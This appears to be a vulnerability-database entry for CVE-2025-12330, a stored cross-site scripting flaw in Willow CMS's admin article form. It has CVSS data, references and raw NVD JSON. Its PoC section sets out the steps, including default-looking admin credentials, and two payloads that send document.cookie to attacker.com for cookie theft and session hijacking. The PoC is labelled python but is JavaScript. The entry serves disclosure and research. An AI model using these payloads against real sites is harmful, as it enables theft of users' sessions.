CVE-2025-12330

Description

A security flaw has been discovered in Willow CMS up to 1.4.0. This issue affects some unknown processing of the file /admin/articles/add of the component Add Post Page. The manipulation of the argument title/body results in cross site scripting. The attack may be launched remotely. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score

2.4

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:matthewdeaves:willow_cms:*:*:*:*:*:*:*:* - VULNERABLE

Willow CMS <= 1.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-12330 PoC - Willow CMS Stored XSS
// Target: Willow CMS <= 1.4.0
// Component: /admin/articles/add (Add Post Page)
// Attack Vector: title or body parameter

// Step 1: Login to admin panel
// POST /admin/login
// username=admin&password=admin123

// Step 2: Submit malicious article
// POST /admin/articles/add
// title=<script>alert(document.cookie)</script>&body=<script>alert('XSS')</script>

// Step 3: When any user visits the article, XSS payload executes

// Example XSS payload for cookie stealing:
const xssPayload = `<script>
  fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>`;

// Example XSS payload for session hijacking:
const sessionHijackPayload = `<img src=x onerror="
  document.location='https://attacker.com/log?c='+document.cookie
">`;

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12330
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12330
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12330/
[4] VulDB https://vuldb.com/cve/CVE-2025-12330
[5] https://github.com/matthewdeaves/willow/issues/131
[6] https://vuldb.com/?ctiid.330115
[7] https://vuldb.com/?id.330115
[8] https://vuldb.com/?submit.674404
[9] https://www.youtube.com/watch?v=jhFCYpFu9qI

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12330", "sourceIdentifier": "[email protected]", "published": "2025-10-27T22:15:41.167", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Willow CMS up to 1.4.0. This issue affects some unknown processing of the file /admin/articles/add of the component Add Post Page. The manipulation of the argument title/body results in cross site scripting. The attack may be launched remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:matthewdeaves:willow_cms:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.4.0", "matchCriteriaId": "E6C082B8-A6EB-4B96-818C-2BF3FB8CA4D9"}]}]}], "references": [{"url": "https://github.com/matthewdeaves/willow/issues/131", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.330115", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330115", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.674404", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.youtube.com/watch?v=jhFCYpFu9qI", "source": "[email protected]", "tags": ["Exploit"]}]}}